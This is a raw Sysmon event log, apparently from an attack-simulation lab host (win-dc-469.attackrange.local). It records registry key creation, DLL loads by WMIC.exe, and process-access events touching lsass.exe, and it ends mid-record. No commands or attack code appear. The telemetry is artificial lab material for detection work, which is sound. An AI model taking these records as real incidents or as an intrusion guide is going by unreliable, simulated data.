12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348397Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348396Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348395Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348394Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348393Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348392Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348391Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348390Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348389Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348388Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348387Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057348386Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\framedynos.dll10.0.14393.4169 (rs1_release.210107-1130)WMI SDK Provider FrameworkMicrosoft® Windows® Operating SystemMicrosoft Corporationframedyn.dllMD5=F5BCBB0713FF862975B07056D25E166E,SHA256=DBB3B6E35E0FEF5B878DE8C85AF578B51C1C2DB025865354E27394AEA87824B2trueMicrosoft WindowsValid 12241200x800000000000000057348385Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348384Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348383Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348382Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348381Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348380Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348379Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348378Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348377Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348376Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348375Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348374Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.590{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057348373Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.590{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 10341000x800000000000000057348372Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.590{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057348371Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.590{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x800000000000000057348370Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\Wbem\CIMOM 12241200x800000000000000057348369Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\Wbem\CIMOM 734700x800000000000000057348368Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.590{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057348367Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.590{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbemcomn.dll10.0.14393.4530 (rs1_release.210705-0736)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemcomn.dllMD5=91E2160941219FFEBE4093E6681BE4CF,SHA256=3B8AA86EAF2200F53A6EB57B08A34F1BA5E467B72E5002C3BCBF20AF40D98CD1trueMicrosoft WindowsValid 734700x800000000000000057348366Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.590{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057348365Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.590{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\wbemprox.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemprox.dllMD5=B7B56FAC395BEEDC20120FD0170A23A3,SHA256=7BDF579D7348D84F251A8411E40E14ADF9406F954914C1C4DE30E880DCF6CEB3trueMicrosoft WindowsValid 734700x800000000000000057348364Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.590{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 12241200x800000000000000057348363Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348362Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.590{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348361Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348360Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348359Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348358Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348357Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348356Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348355Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348354Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348353Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348352Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348351Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348350Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348349Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348348Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057348347Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exeMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072trueMicrosoft WindowsValid 12241200x800000000000000057348346Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348345Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348344Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348343Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348342Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 10341000x800000000000000057348341Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x800000000000000057348340Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348339Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348338Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348337Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057348336Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 12241200x800000000000000057348335Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348334Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057348333Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057348332Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057348331Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057348330Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057348329Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057348328Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000057348327Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 10341000x800000000000000057348326Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057348325Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 